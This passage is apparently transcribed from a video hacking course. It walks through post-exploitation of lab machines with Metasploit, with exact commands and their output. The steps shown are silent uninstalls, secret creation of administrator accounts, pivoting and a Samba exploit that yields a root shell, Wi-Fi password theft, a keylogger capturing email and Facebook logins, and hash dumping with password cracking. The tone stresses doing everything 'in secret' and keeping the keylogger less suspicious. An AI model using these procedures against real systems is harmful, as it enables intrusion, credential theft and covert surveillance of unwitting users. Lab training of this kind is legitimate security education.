uninstall, etc. So if we checked here is the program, Visual Studio 2012, 86-bit, and I'm gonna come back to my Kali machine and I'm gonna press enter here, and I'm gonna wait a little bit, and you can see here the method execution successful. If I came back here and make a refresh, you can see it's gone and we have uninstalled this program. So we learned from this lecture how to uninstall the programs and software that is in the target machine, and everything is gonna be happen in secret, so that the user don't have to press yes or no or uninstall. He don't have to approve this process. Everything is gonna be happen in secret. In this video, I'm gonna show you how to add or remove any user you want, or even how to change the administrator password. And to do that, you should have the administrator privileges. So firstly, I'm going to start by editing a user account in the target operating system. Then I'm going to make the exact same user as an administrator. Then I'm going to change the administrator password to another password, and then I will de-escalate the administrator privileges to a normal user. And I'm gonna do that using Windows PowerShell command line. Now let's see how we can do that. Okay, so the first thing I'm gonna do, I'm gonna check my privileges by typing get UID, and you can see that I am in a 30 system. So if I came back to the target machine and check how many users there is, so manage another account, you can see there is only one user, which is the administrator, and it has a password. So first I'm gonna add a new user, but before we do that, I'm gonna interact with the Windows PowerShell command line. So I'm gonna type shell, then I'm gonna type net user to see all the available users, and you can see here that there is IE user, which is an administrator. And if I want to add a new user, I'm gonna type net user, then the name of the user, let's say test, then /add, then I'm gonna press enter, and you can see the command completed successfully. If I type net user again, you can see that I have a guest called test, and administrator is IE user. Let's check here. Let me come back here and manage another account, and you can see here there is a local account. It doesn't have the administrator privileges, and it's called test. Let's say that I'm gonna add a password for this account. I'm gonna use the same command, which is net user. Then I'm gonna add the username that I have created, and I'm gonna say the password is 1234, and I'm gonna press enter. So the command has completed successfully. I'm gonna come back to the target machine, and I'm gonna show you that now this account has a password. Now let's say that I'm going to escalate the privileges in this this account and make it an administrator. So what I'm gonna do is I'm gonna type net local group administrators. Then I'm gonna say test, which is the name or the username of the account, then /add. Then I'm gonna press enter, and you can see here that the command completed successfully. So it's net local group administrator. Then I'm gonna add the username of the account that we have created, then add to make it an administrator. Let's check again here. As you can see, it's an administrator right now. So if I type net user test, I can see all the available information for this account. So you can see that the password last set and password expires, and the user may change the password and all the information, and it's an administrator as well. So let's say that I'm gonna delete this account or remove the password. Let's say first I'm gonna remove the password. So I'm gonna say net user, then I'm gonna put the username, and I'm gonna put double colon. So it's gonna be like this, and I'm gonna press enter, and now our test user doesn't have a password. Let's check here. You can see it doesn't have any password. Let me say that I'm gonna delete this account. So I'm gonna type net user, then the username, and I'm gonna say /delete and enter, and the command completed successfully. let me check if this account is available anymore. So I'm gonna come back, manage another account, and you can see it's gone. So now we have only the IE user account, which is the administrator. I'm gonna remove the password of this account. So I'm gonna say net user as we did before. I'm gonna put the username, IE user, and I'm gonna do like this to remove the password as we did before. And the command completed successfully. So manage another account, you can see it doesn't have any password. So I'm gonna see if I can de-escalate the privileges. I'm not sure whether this is gonna work or not, but let me try it. So I'm gonna type net local group, then administrators, then I'm gonna add the username, which is IE user / delete. I'm not sure that this command is gonna work because there should be one administrator account in the target computer. So I'm gonna try. So as you can see, there is an error. So we learned from this video how to add or remove any user or any account that exists in the target machine. And we learned how to remove any password from any account, whether it's an administrator account or it's a normal user account. And we learned how to escalate a user account to make it work as an administrator. In this lecture and in the next lecture, we're going to be talking about pivoting. So what is pivoting? Pivoting is a very powerful technique that allows the attacker to use the compromised system to compromise other machine in the same network or in another network that the compromised system has access to. And we use pivoting because these machines are invisible to the attacker. Now let's take an example. In this photo we have the attacker and the internet and the hacked operating system, and 3 computers are connected to the same network of the hacked operating system. Now let's assume that we are the attacker and we have hacked Windows 10 through the internet, and our next target is Metasploitable machine. And let's assume that Metasploitable machine has sensitive files and information, and we want to get this files and information. But the only problem with Metasploitable is that it's protected, and it's by using a rule in its firewall says none of the devices on the internet can ping or scan this computer or Metasploitable machine except this IP address, or it could be more than one IP address. So even if I scanned or pinged the Metasploitable machine by using the attacker machine, I'm not going to be able to get a ping request because it has a rule says none of the devices on the internet can ping this computer except this IP address of the Windows that we have hacked. So what we're going to be doing here, first we're going to try to ping the Metasploitable machine by using the hacked Windows operating system. And once we get a ping request, we're going to be making a route from the hacked operating system, from the hacked Windows operating system to Metasploitable machine. And after that, I'm gonna scan Metasploitable machine, and this is by using the hacked operating system to see, and this is going to be using Nmap tool. I'm gonna check whether Metasploitable has vulnerabilities, and after I find any vulnerability, I'm gonna use a ready exploit in Metasploit to exploit the Metasploitable machine. So this is case number 1. Case number 2 is this hacked operating system could be connected to 2 networks. So one network is let's say that the IP address of this computer 10.0.2.15, and this 10.0.2.16, 10.0.2.17. So these 3 devices are on the same subnet, so they can interact with each other. But the problem is that Metasploitable machine has 10.0.3.15, so it's in a completely different subnet. So we're gonna be doing the same thing. We're gonna make a route. Then from the route, we're gonna scan the Metasploitable to check whether it has a vulnerability or not. Then we're gonna be using a ready exploit from Metasploit, and we're gonna exploit this Metasploitable machine. Okay, so the first thing we're going to be doing is we're going to configure the network settings. But before we do that, I'm going to check the IP addresses of my virtual machines. So if I came back to my Linux machine and open new terminal, then I'm going to type ifconfig to see my IP address. You can see here that my IP address is 10.0.2.15. And if I came back to my Windows machine and type ipconfig, you will see that my IP address is 10.0.2.8. And let me check in my Metasploitable. I'm going to type ifconfig, and you'll see it's 10.0.2.7. So all of these virtual machines are on the same subnet, which is number 2. So 10.0.2.7, and here it's 10.0.2.15, and here it's 10.0.2.8. So to configure the network setting, first I'm going to shut down all the virtual machines. Then I'm going to open VirtualBox, and I'm going to the VirtualBox preferences from here. Then I'm going to network, and I'm going to add a new NAT network, and I'm going to double click on it, and then I'm going to call it 10.0.1 NAT, and I'm going to change the subnet to number 1, and I'm going to say OK. And here's my new network, NAT network, and I'm going to say OK. So right now I'm going to change the network settings of Windows 10 VirtualBox or virtual machine. I'm going to select it, then I'm going to settings, and then I'm going to network, and I'm going to adapter number 2. I'm going to say enable network adapter, and I'm going to select NAT network, and the name is going to be 10.0.1 NAT that we have created, and I'm going to select here allow virtual machines, and then I'm going to say enter or OK. Now I'm going to select Metasploitable. I'm going to say settings and network and enable network adapter. I'm going to select NAT network, and it's going to be on 10.0.1 NAT and allow virtual machine, and you don't have to enable this or the second adapter. Then I'm going to say OK. So right now my Windows virtual machine is connected to two NAT networks. The first one is 10.0.2 and the second one is 10.0.1. So that means that the Windows 10 can communicate with Linux because they are on the same network or on the same subnet, and it can also interact and communicate with Metasploitable because it also has a second NAT network which is 10.0.1 that that's enabled, or the Metasploit is connected to it. So Windows machine can interact with Metasploit or can ping Metasploit and can ping Linux, but Linux cannot ping Metasploitable because it's on a different subnet. So right now I'm going to run all the virtual machines. And now I'm going to log into Metasploitable by typing the username, which is msfadmin, and the password is going to be also msfadmin. And now I'm in Metasploitable. I'm going to my Windows machine and type the password, which is password. And I'm going to my Linux. I'm going to enter the username as root, and the password is going to be 2. And now I'm in Linux. So if I check the IP address of Linux machine, it's going to be the same because we didn't change the network settings for Linux. So I'm going to type ifconfig. And you can see here that my IP address is the same, 10.0.2.15. And I'm going to come back to my Windows machine, and I'm going to press the Windows key and R, and I'm going to type cmd to run the command prompt. And now I'm going to type ipconfig to see my IP address, and you will see that Windows machine is connected to two interfaces. The first one is 10.0.2.4, which is the old one, and the second one, which is the new one, it's 10.0.1, so it's in different subnet. It's 10.0.1.5. So let me come back to my Metasploitable and check the IP address, and as you can see, it's 10.0.1.4. Let me type ifconfig again. As you can see, it's 10.0.1.4, and it has only one IP address, and it's on subnet number 1. And here in Windows 10 we have it's connected to two NAT networks. The first one is on subnet number 2, and the second one is in subnet number 1, so that it can interact with Kali Linux because they are on the same subnet, which is number 2, and it can interact with or it can send a ping request to Metasploitable because it's also on the same subnet, which is number 1. So let me come back to my Kali Linux machine. I'm gonna type clear, and now I'm gonna ping the Windows machine. I'm gonna say ping 10.0.2. Let me check it again, 2.4. And as you can see, I'm getting a ping response. But if I try to ping 10.0.1.5, you will see that I'm not gonna be able to get a ping response. So I'm gonna say ping 10.0.1.5, and as you can see, it's gonna give me a message says timed out. So we're not getting a ping response. So as you can see, it wasn't able to get the ping response because it's in a completely different subnet. Let me ping also the Metasploitable IP address, which is 10.0.1.4. So I'm gonna say ping 10.0.1.4, and as you can see, I'm not able to ping Metasploitable because it's in a different subnet. So let me come back to Windows machine and try to ping my Kali Linux machine by typing ping and then the IP address of my Kali Linux machine, which is 10.0.2.15. And as you can see, we're getting a ping response. And if I try to ping Metasploitable by typing ping, then the IP address of Metasploitable 10.0.1, I think it's 1.4. As you can see, we are getting a ping response. And in the next lecture, I'm going to show you how you can make a route from the hacked operating system, which is Windows 10, to the Metasploitable machine, so that you can ping a Metasploitable machine and scan it using Nmap to search for vulnerabilities. And once you find a vulnerability, you're going to use a ready exploit from Metasploit. Okay, so here we have when the session is open, and the first thing we're going to be doing is we're going to check the networks that the target is connected to. So first I'm going to type sessions to interact with session number 1. So session minus I to interact, then the ID number of the session. And now I'm going to type shell to interact with Windows command shell. And now I'm going to type ipconfig to see the network configuration. So here we can see that our Windows machine or the hacked Windows operating system is connected to two networks. The first network is 10.0.2.1 and the second network is 10.0.1.1. If we open new terminal and I'm going to type ifconfig to see my Kali Linux IP address, you can see that my IP address is 10.0.2.5 and it's the same subnet as 10.0.2.1. So as you can see here, and if we try to ping 10.0.2.1, you will see that we will be able to ping or get a ping response from this IP address. But if we try to ping 10.0.1.1, which is the one that is in another subnet, we will not be able to get a ping response. Let's try this. So I'm going to type ping 10.0.1.1, and as you can see, we are not getting a ping response. So from here we were able to see the network that the target is connected to. So it's connected to two networks. One of them is 10.0.2.1 and the second one is 10.0.1.1. So what we're going to be doing is we're going to make a route from 10.0.2.1 to 10.0.1.1 so that we can scan 10.0.1.1 to check the live hosts. So now I'm going to type exit and I'm going to say background. I'm going to put this session on the background. I'm going to say clear. And now I'm going to use a module to make this route. So I'm going to say use post Windows manage then auto route, and now I'm going to press enter. Now I'm going to say show options. Let me onset session. and unset the subnet just to give you a better idea. Now I'm gonna say show options. Okay, so the first thing we're gonna be specifying is the session. So the session is number 1. So set session is number 1, and the subnet is the subnet that we have discovered, which is 10.0.11. Okay, so I'm gonna type set subnet 10.0.1, but instead of 1, we're gonna say 0. Now I'm gonna say run to make the route from 10.0 to 1 to 10.0.1. So if I typed, now we have the route, and if I typed route, you will see that I have a route in session number 1. So we have 10.0.1.0 and 10.0.2.0. So now we're gonna check the live host is in 10.0.1.0. And to do that, we're gonna use a module. So I'm gonna type use auxiliary scanner discovery, and now I'm gonna add ADP sweep, and I'm gonna press enter. So if I type show options, I'm gonna see these options, and I'm gonna set the R host. So I'm gonna say set R host, then I'm gonna add 10.0.1.0, then /24 to scan the hosts from number 0 to 254. Now I'm gonna say enter, and now I'm gonna say threads. You can leave it as 10, and I'm gonna specify it as 50 because it's gonna be faster. And now I'm gonna say run. Okay, so as you can see here, we have a host. We have discovering DNS on 10.0.1.1, which is the default gateway, and we have discovered 10.0.1.4 with this, and you can see that the machine is called Metasploitable, and you have here some open port. This is not very useful information. You can just leave it. But the main idea is that you have discovered the live IP address of this subnet. So 10.0.1.0 subnet has 10.0.1.1 and 10.0.1.4 running in this network. So our target right now is 10.0.1.4, which is the Metasploitable. And even if we check the IP address of the Metasploitable, I'm going to type ifconfig, and you can see here that its IP address is 10.0.1.4. So now I'm going to come back to my Cal Linux machine, and I'm going to scan this host. So I'm going to use a module called port scan, and I'm going to scan for TCP open ports. So I'm going to say use auxiliary scanner. Now I'm going to say port scan and TCP. And if I type info to see the information, it's going to scan the open TCP services of the R host. So first thing, I'm going to specify the R host, and we have got the R host from the UDP sweep scan, which is 10.0.1.4. So our target right now is 10.0.1.4. So I'm going to say set R host 10.0.1.4, and if I typed enter or run, you will see that it's going to scan the open ports of 10.0.1.4. But before we do that, let me type run first. You can see that it starts scanning the open ports. So we have 25, 21, 23, 22, 53, and it's going to continue scanning the open ports. But for now, I'm going to say Control C, and I'm going to type show option again, and I'm going to specify the port. So I'm going to check only whether the 139 port is open or not. So if I'm going to type set ports, and I'm going to say 139, and now I'm going to press enter. So it's going to scan 10.0.1.4 if this 139 port is open or not. So if I type run, you will see that this IP address or this port is open. So 10.0.1.4 TCP open. So the next step is we're going to use a ready exploit from Metasploit that exploit the port 132 in Metasploitable. So it's called let me use this exploit. It's called use exploit and multi samba user map script. So now I'm gonna press enter. If I type show options, I'm gonna see this available options. So as you can see, it uses the port 132 to exploit the machine, but I have to specify the R host, which is 10.0.1.4 that we have discovered using the UDP sweep scan. So I'm gonna say set R host 10.0.1.4, which is the metasploitable IP address. And now I'm gonna say show options again. So the exploit multi-samba user map script exploit, it's gonna be using the port 139 to get a reverse connection to our Cal Linux machine. But before we do that, there should be a payload that will be executed on the target machine in order to get a reverse connection. And we can use any payload. In my case, I'm going to use this payload, which is, so I'm going to say set payload cmd unix and bind netcat. And then I'm going to say enter and show options. And you will see that the R host is already specified, and the L port you can change it to whatever you want. So it could be 8080, 111, 1234, but it's by default 444. So I'm going to leave it like this. And here we have the exploit that we're going to be using it. It's going to be targeting this IP address, which is the metasploitable IP address, through this port 139. And the payload that is going to be running in the target machine is the bind netcat. And once I type run, you will see that I'm going to get a reverse connection from Metasploitable. And as you can see, we have command shell session up to open. So if I type pwd, you will see my current directory, and it's going to list all the folders and files. And let me say ID to see my privileges. And as you can see, UID is 0 root. And the GID is 0 root. So this is case number 1. In the next video, I'm going to show you another case could happen with you where all the IP addresses are the same. So it's going to be 10.0.2 and something, but Cal Linux will not be able to ping Metasploitable because Metasploitable has a rule says none of the devices on the internet can ping Metasploitable except a certain IP address, and this IP address is going to be the Windows that we have hacked. So what we're going to be doing is we're going to do the same thing. We're going to make a route, then we're going to scan it using nmap. We're going to use this time nmap to scan it and see the installed services, and then we can search for the service in the Metasploit database, and then we can use this ready exploit to exploit the Metasploitable machine. Now we'll move to the second case, where all the IP addresses of all the virtual machines are going to be the same. But the only problem is Metasploitable has a rule says none of the devices on the internet can ping it except certain IP addresses, and these IP addresses are going to be the Windows machine that we have hacked. So even if we try to ping Metasploitable using our Cal Linux, we will not be able to get a ping response because Metasploitable has a rule. But if we try to ping Metasploitable using the Windows machine that we have hacked, we'll be able to ping it. So the first thing we're going to be doing is we will configure the network of Metasploitable. So if we check the network of the Cal Linux, you will see that it's on NAT 2, so 10.0.2 NAT. And if we check the network configuration of Windows machine, it's going to be 10.0.2 NAT. And if we check the Metasploitable configuration, it's in 10.0.1, and we will change it to 10.0.2. And now I'm going to say OK, and now I'm going to run all the virtual machines. Okay, so after running all of the virtual machines, now I'm going to open the terminal. And I'm going to try to ping my Windows machine first. So I'm going to say ping 10.0.24. And as you can see, I'm getting a big response. Now let me get the IP address of my Metasploitable. It's 10.0.2.7. Let me come back here and I'm going to say ping 10.0.2.7, and I'm getting a big response because we didn't set the rule in the Metasploitable, and now I'm gonna show you how we can set it. So if you came back to our Metasploitable machine, I'm gonna say clear, and now we're gonna be adding a rule. So before we do that, I'm gonna say sudo su to get the root privileges, and I'm gonna add my password, and now I am the root. Let me say clear again. So I'm gonna say IP tables, and then I'm gonna say minus A, capital A, which is append. So we're gonna append to chain. The chain is gonna be input, and now I'm gonna put the source IP address, which is it has been the IP address of our Windows machine, so it's 10.0.2.4, and minus J to jump, and now I'm gonna say accept. So it's gonna accept all the packets from that machine, or all the ping response, ping request from the Windows machine, and now I'm gonna say enter. So let me show you the command again. IP tables, it's like the where you can put the rules, minus I to append to the chain input. So you are appending to input chain, and you are adding the source IP address is 10.0.2.4, and minus J to jump, and accept all the ping requests from the Windows machine. So if I type IP tables again, minus L or capital L, you will see that we have the rule says accept from the target, the source IP address 10.0.2.4, and the destination is gonna be anywhere. So right now I can ping Metasploitable, or I can ping Metasploitable using my Windows machine, and actually my Windows machine or my Kali Linux machine also able to ping Metasploitable machine. So now we're gonna be setting the second rule. So I'm gonna say IP tables, and then minus A, and I'm gonna say input, and now I'm gonna say minus J drop. So IP table minus A to append to input chain, and minus J to jump, and we're gonna drop the packets from all the IP addresses. So I didn't specify a certain IP address or a source IP address or a destination IP address. So it's gonna be from all the IP addresses, and all the IP addresses will not be able to ping this Metasploitable machine. So I'm gonna say enter. Let me check again. IP tables minus capital L. Let me repeat the command again. Clear. I'm gonna repeat it again. Okay, so as you can see here, so we have a rule says accept from this IP address, the source IP address, the packets, and drop all drop the packets from anywhere. So we didn't specify the IP, so all of the IPs on the internet cannot ping the Metasploitable machine. So now let me go to my Windows machine, and I'm gonna open new terminal. So I'm gonna type cmd, and now I'm gonna say ping 10.0.2.7, which is the IP address of Metasploitable, and as you can see, I'm getting a ping response. But if I came back to my Kali Linux machine and try to ping Metasploitable, so ping 10.0.2.7, as you can see, we're not getting a ping response. So the next step is you will go to the metapredator session of Windows 10 that you have hacked. Here is it. And I'm going to interact with this session by typing sessions minus I, and then the ID of the session. Here's it. I'm in Metapredator command line, and I'm gonna say shell to interact with Windows command shell. And as you can see right now, and I'm gonna type ipconfig to see the IP configuration. And you can see here that the target is connected to only one network, 10.0.2.1. So before it was connected to two networks. The first network was 10.0.2.1, and the second network was 10.0.1.1. But this time is different. So the first thing we're going to be doing right now is we will scan this subnet or this IP address to see whether there is a live hostess or not on this IP address. And then we will use the UDP sweep to see the Metasploitable computer or Metasploitable machine. And then we're going to be using the exploit, or we're going to make a route first. Then we can use the UDP sweep, and then you can make or use the exploit to exploit the Metasploitable. So now let me say exit. And now I'm gonna type run ARP scanner to see the live host, and then minus R, then the target 10.0.2.1, which is the default IP address of the target network that is connected to it, /24 to scan from 1 to 254, and now I'm gonna say enter. And here you can see some IP addresses. So we have 10.0.2.2 it not exist, and 10.0.2.1 is the default gateway, 10.0.2.4 is the Windows machine IP address, and 10.0.2.3 is the virtual machine or virtual box IP address. And we have also 10.0.2.7, which is the Metasploit IP address, and 10.0.2.5 is our Linux IP address. So I'm gonna say Control C, and what I'm gonna do right now, I'm going to say background, and I'm gonna set a route. So to do that, we saw how to do that before. I'm gonna say use post Windows manage, and now I'm gonna say auto route, and then enter, and now I'm gonna say show options. So now I'm gonna set all the options. So we have the session is number 1, and the subnet is going to be the subnet that the target network is connected to it. So it's 10.0.2. You can say 1 or 0, it's okay, but it's better if you set it as 10.0.2 then 0, as you can see here in the example. So now I'm going to say enter to make the route, and as you can see, the route subnet has been added. And now the next step is we will scan this subnet from the live host using the UDP sweep to see and determine the IP address of Metasploitable. So I'm going to say use auxiliary, then scanner, discovery, and lastly I'm going to say UDP sweep, and I'm going to press enter. So I'm going to type show options to see the available options, and here you will set the R host, which is 10.0.2.1, or the default gateway 10.0.2.1, and /24 to scan from 1 to 200 or 254, and the threads I'm going to leave it as 10. So I'm going to say enter, and here we have the default gateway, and you can see here that we have 10.0.2.7. And if we check here, you will see that it's a Metasploitable. So now we're going to be using our, now we're going to scan the ports on this machine by using the port scanner. So I'm going to say use auxiliary scanner port scan TCP to scan Metasploitable. And I'm going to say show options, and here is all the available options. And I'm going to check the port. I'm going to say set ports and 139. I'm going to check 139 whether it's open or not. And I'm going to set R host after getting the IP address of Metasploitable, which is 10.0.2.7. Here's the R host. And now we're ready to go. So I'm going to say run. And you can see here that TCP open. So from here I can know that I can use the user map script exploit as we did before. So now I'm going to say use exploit multi samba and user map script, and I'm going to press enter. So now I'm going to say show options, and I'm going to set the R host as 10.0.2.7, which is the IP address of Metasploitable, and because the 139 port is open, we can use this exploit. And you can see that we're going to get a reverse connection on port 44.4 on our Kali Linux. So I'm going to say run. So for some reason it didn't work. Let me try again. I'm going to try to change the L port. Or I'm going to change the payload. So I'm going to say set payload cmd Unix, and then I'm going to say bind netcat, because not all the payloads works. So here is our payload. I'm going to say show options, and you can see here that the exploit is exploit multi-samba user map script on port 139, and we're going to get a reverse connection on port 444 using this payload cmd Unix bind netscan. So now let me say run. And as you can see, session 2 is open. So if I type pwd, you can see my directory. And if I type id, you can see that I have the root privileges, ls to list all the available files and folders. So we learned from this lecture and from the previous lectures what is the pivoting and how to perform it. We saw how to perform pivoting in two cases. The first case, if the target is connected to two networks, so you're going to scan the two networks to check the live IP addresses on that network, and then you can use then you can scan the host, and then you can use an exploit. And the second case, the target or your next target, which is Metasploitable, could has a rule says none of the IP addresses can ping it except the Windows machine, and we saw how to scan the subnet and make a route and then exploit it using a ready exploit in Metasploit. In this lecture and in the next few lectures, we are going to focus on gathering as much as possible of information from the compromised system, and this is by using some Metasploit module that allows us to do that. And we're going to start by stealing the password of the Wi-Fi access point that the target is connected to. So first we will see the Wi-Fi access point name that the target is connected to. Then we will check the available Wi-Fi access point that is in the target range. And after that we are gonna steal the password of his access point. And lastly, we will try to disconnect him from the access point. Now let's see how to do that. Okay, so before we get started, I want to mention that I have switched to Mac OS X and I'm not using Windows. And I'm using a VirtualBox program instead of VMware Workstation. So you will notice that my IP address has been changed. So if I open the new terminal and type ifconfig, you will see that my IP address or my new IP address is 10.0.2.15. But that's not going to be a problem for you because I showed you how to install VirtualBox and how to install VMware Workstation and how to set it up. So I'm going to exit and come back to my MSF console interface, and I'm going to type sessions to see all my available sessions. And you can see here that I have one available session or one Metasploit session is open, and it's Windows 10 that we have hacked before. So to see the current connection that the target is connected to, or the Wi-Fi access point that the target is connected to, we're going to use this module. So we're going to type use post Windows, then WLAN, then it will write WLAN underscore. If you click double tap, you will see these four modules. So the first module, which is WLAN BSS list, that will show you all the Wi-Fi access points that surrounded the target network. And WLAN current connection will show you the Wi-Fi access point that the target is connected to. And we have WLAN disconnect that used to disconnect the target from his access point, so he's not going to be able to connect to the internet, and he's not going to be connected to the internet automatically anymore. And we have also WLAN profile that will show you the information of the target access point, and it will give you the password. So I'm going to start first with WLAN current connection. So WLAN current connection, and I'm going to type show options, and the session is already set. And I'm going to type run. And you can see here that the name of the access point is iSecurity Pro. As you can see, the iSecurity Pro. This ID is iSecurity Pro. And the access point MAC address is this one. And you can get some information of the rate. And you can see here the security is enabled. That means it has a password. And it's SCCMP cipher BSK. So you can see here also that he's using this Wi-Fi card. So let's move to the next module, which is WLAN BSS list that will show you all the Wi-Fi access points that surrounded the target. So I'm gonna type again here, use post Windows WLAN underscore and BSS list. I'm gonna type show options, and I'm gonna set the session by typing set session number 1. Then I'm gonna type run. And as you can see here, that here's all the access points that surrounded the target computer. You can see here the number of networks is 11. So we have iSecurity Pro and the MAC address, and you can see it Antimedia, Frightsbox, and also we have O2. I'm gonna check that in my Windows machine just to confirm that. So if I go to the Wi-Fi access points from here, you can see iSecurity Pro, Frightbox, O2, Multimedia, and more. So I'll come back to my Cal Linux and I'm gonna check the password of this Wi-Fi access point that the target is connected to. So I'm gonna use post Windows WLAN underscore, but this time I'm gonna type profile. Enter, then I'm gonna say show options, and I'm gonna set the session, which is number 1, and then I'm gonna say run. And as you can see, if we start from the top, you will see that the name is iSecurity Pro, and it will give you some information like the connection mode is auto, and the encryption AES. And you can see here the key material is security 000, which is the password of the Wi-Fi access point that the target is connected to. So this is the most important content from all of this message. Okay, so if I came back to the target machine and test the same password just to confirm that, so I'm gonna forget this network from here. So manage now networks, and I'm gonna click on it and forget it. And now I'm gonna show you that this is the password, security 000. I will come back here and use the same password to connect to the network. So I'm gonna type security 000. Here is it. So I'm gonna say next. And as you can see, it's connected. So I'll come back to the target machine, and I'm going to use the module that allows us to disconnect the target from the access point that he's connected to. So I'm going to use post Windows WLAN underscore, but instead of profile, I'm going to change it to disconnect, and then I'm going to say show profiles, and I'm going to say or I'm going to set the session, set session number 1, and if we came back here, you can see that the target is connected to this access point. Let me close this. And now we're going to disconnect him from this network. So run, enter, and I will come back here. You will see that he has been disconnected from the network. As you can see here, he's not connected to the network. So we learned from this lecture how to see the Wi-Fi access point password that the target is connected to, and also we've seen how to see all the available networks or Wi-Fi access point that surrounded the target, and also we've seen how to disconnect him from his connection or his Wi-Fi connection. In this lecture, I'm going to show you how to gather the visited websites from the target browsers. That means that we will be able to see all the visited websites and all the downloaded files on his operating system. And then I'm going to show you how to steal the stored password from the target browsers. So, if the target tried to log into his email or Facebook account and he enabled the Remember Me option, his password will be stored in the browser and will be able to steal that password. So first we are going to gather the visited websites from the target browser, and this is by using a Metasploit module. Then I'm going to steal the stored password on his computer by uploading a small program allows us to steal all the stored password from all the installed browsers. Now let's see how to do that. Okay, so before we get started, I'm going to show you the available session that I have. So if I type sessions, you can see that I have one Metasploit sessions open with the Windows 10 that we have hacked. And as I said in the introduction, the problem with the module that comes with Metasploit command line, that you cannot run it in the background, and also you cannot save the keystrokes. So the module that we're going to use it called key log recorder. You can go to it by typing use post Windows capture key log recorder, Then you're gonna press enter. So if you type show options, you can see all the available options. We have capture type explorer, so it's gonna capture everything that happens in the explorer, or all the keystrokes in the explorer. And we have interval that used time interval to save keystroke in seconds. I'm gonna leave it as 5 seconds. And lock screen, I'm gonna leave it as false, and it will log the system screen, because this is gonna be less suspicious if you leave it as false. And migrate, if you want to migrate the keylogger with a certain running process in the target machine. And if you set it as true, you can put the PID of the running process. Then lastly, the session. But for now, I'm going to set only the session. Then I'm going to type show options. So we have explorer, so it's going to capture everything in the explorer, and it will capture the keystroke every 5 seconds. And lock screen, I'm going to leave it as false because this is less suspicious. And migrate, I'm going to leave it also as false, because it will capture everything in the explorer, and it will be already migrated with the explorer, so you don't have to migrate it with other process. And if you set it as true, you can put the PID of the running process, and the session is number 1. So I'm going to type run, and you will see here that it will create a new txt file in .msf4 folder, which is hidden. Lot, then this is the name of the txt file. So I'm going to come back to the target machine, and I'm going to run the notepad, and I'm going to type something. So I'm going to type, this is my private email and password. Then I'm going to type the email here, sad@gmail.com, and the password, let's say for example sad12345. So I'm going to come back to the target to the attacker machine, and I'm going to open new terminal. And if you want to read what is into the txt file from the terminal, you can use cat, and then from the .msf4 to the end, which is the full path of the txt file. You are not gonna put root because you are already in root. So I'm gonna put past, and if I press enter, you can see here. So everything was written in notepad.exe, and this is email and password. You can read here, sad@gmail.com. So we can see here that right shift, it's gonna show you the right shift, and also enter and everything. So, and the password is sad12345. Right now I will come back to the target machine, and I'm gonna do something more dangerous by opening the browser. Let's say for example I'm gonna log into my Facebook account. So if I type facebook.com, and I'm gonna type, just for example, my email, sad@gmail.com, and my password is sad1234567, and I'm gonna press enter. And of course this is a false information, so it's not gonna log in. So I'm gonna come back to the attacker machine, because Facebook for some reason doesn't respond. And this time I'm gonna browse the txt file from the leaf pad. So let me just, okay. If you open the files from here, you will not see the .msf4 folder, because actually it's hidden. And if you want to see it, just go from here, show hidden files. You can see here .msf4, double click on it, then in lot, you can see here there is lot folder. So you are going to lot, and this is the last file, or the txt file that has been created. So I'm going to double click on it, and then I can browse everything from here. So I'm going to scroll down. You can see here C program files in Google Chrome has been written, FA, which is shortcut for Facebook. Then we pressed enter, as you can see here, CR, and you will see here that sad right shift, then add gmail.com, and my password is 123456. So you can capture everything in any page, even if it's using a HTTP as a protocol, because actually you are not like downgrading the connection as I explained in my Wi-Fi hacking course. You are not downgrading the connection from HTTPS to HTTP. You have injected a keylogger that capture everything happens in the Explorer. So we learned from this lecture how to capture the keystrokes of the target machine and how to save his keystrokes in a TXE file so that we can read it anytime we want. So even if he was typing his sensitive information or he was trying to log into a certain website that uses HTTPS protocol, we will be able to capture all of this information, and this is by injecting only a keylogger in the target machine. Another method to get the user password or the administrator password, and it's by dumping the local user's accounts passwords from the SAM database using the registry. And to dump the user's password hashes, you must have the administrator privileges. And we saw how to do that in a previous lecture. Okay, so we're going to be using a module called hashdump, and hashdump module will dump all the password hashes of the user's accounts. But before we do that, we must migrate our backdoor with any system running process, then we will dump the user's hashes. And lastly, we're going to be using a tool called John the Reaper to crack the hash. And John the Reaper is a fast password cracker software tool that can be used to crack the hashes. Now let's see how to do that. Okay, so here I have one Metasploit sessions open with the administrator privileges. So if I type sessions -i5 to interact with session number 5, and then I'm going to type get system to see my privileges, you will see that I am an admin in the memory, and if I type get UID, you will see that I'm an authority system. But if you type hashdump to get the password hashes, you will see that it's going to give you an error. So the parameter is incorrect because first you have to migrate your process with any running system process. So what I'm going to do right now, I'm going to list all the running processes by typing PS as we did before. And here's all the running processes as you can see here. And I'm going to migrate my process with any system process. Let's say, for example, I'm going to migrate it with Google Crash Handler here. So the PID of this process is 5556 and it's an authority system. So I'm going to say migrate, then I'm going to put the PID of Google Crash Handler, which is 5556, and I'm going to press enter. And now I'm going to migrate my process or my backdoor with the Google Crash Handler. And as you can see, it's successfully completed. So what I'm going to do right now is I'm going to try to type hashdump, and you'll see that we were able to get the password hashes. But before we do that, I'm going to change the password of my Windows machine. So I'm going to come back to my Windows machine, and then I'm going to settings, and I'm going to user accounts, and then user accounts, manage another account, and change the password. So my new password is gonna be test1234, test1234, and we have changes. So our new password is test1234. Okay, now let me come back to my Cal Linux and type hashdump again because the hash has to be changed. And I'm gonna minimize the window a little bit, and I can only copy the IE user hash because it also had the administrator privileges, so you don't have to crack the administrator password because the IE user is also the administrator. So I'm gonna copy the password or the hash of the password for the IE user, and now I'm gonna open new terminal and create a new text file on my desktop. So let me say cd to change my directory to desktop, and now I'm in desktop, and I'm gonna type nano, and I'm gonna call the file that I'm gonna create it hash, and then I'm gonna press enter. Now I'm gonna pass the hash that I have copied here, then I'm gonna say Ctrl O to save it, then I'm gonna press enter and Ctrl X to exit. And as you can see, now we have a new txt file called hash. So in order to crack this hash, you should have a word list. So we can get this word list from the internet. You can download it from the internet, or you can create a manual one and the password of the user has to be into this password list. So if it wasn't in the word list, so you'll not be able to crack the password. And also you can take a word list. You can copy a word list from that comes with John the Reaper tool. So if you go, let me type cd to come back my root directory. I'm gonna say cd user share John, which is the full path of John the Reaper tool. And now I'm gonna say ls, and you will see here that John the Reaper comes already with a password list. So I'm gonna take this password list. So I'm gonna say copy password lst to my root desktop, and I'm gonna press enter, and as you can see, here is the new password list. Let me open it and see whether my password is into this word list. So test1234, it's not in here. So I'm gonna add my password manually, which is test1234. Let me add it here. Here is it. It's test1234. I'm gonna say Ctrl S to save it, and I'm gonna exit. And now we're gonna be using John the repo. Let me say cd to come back to my root 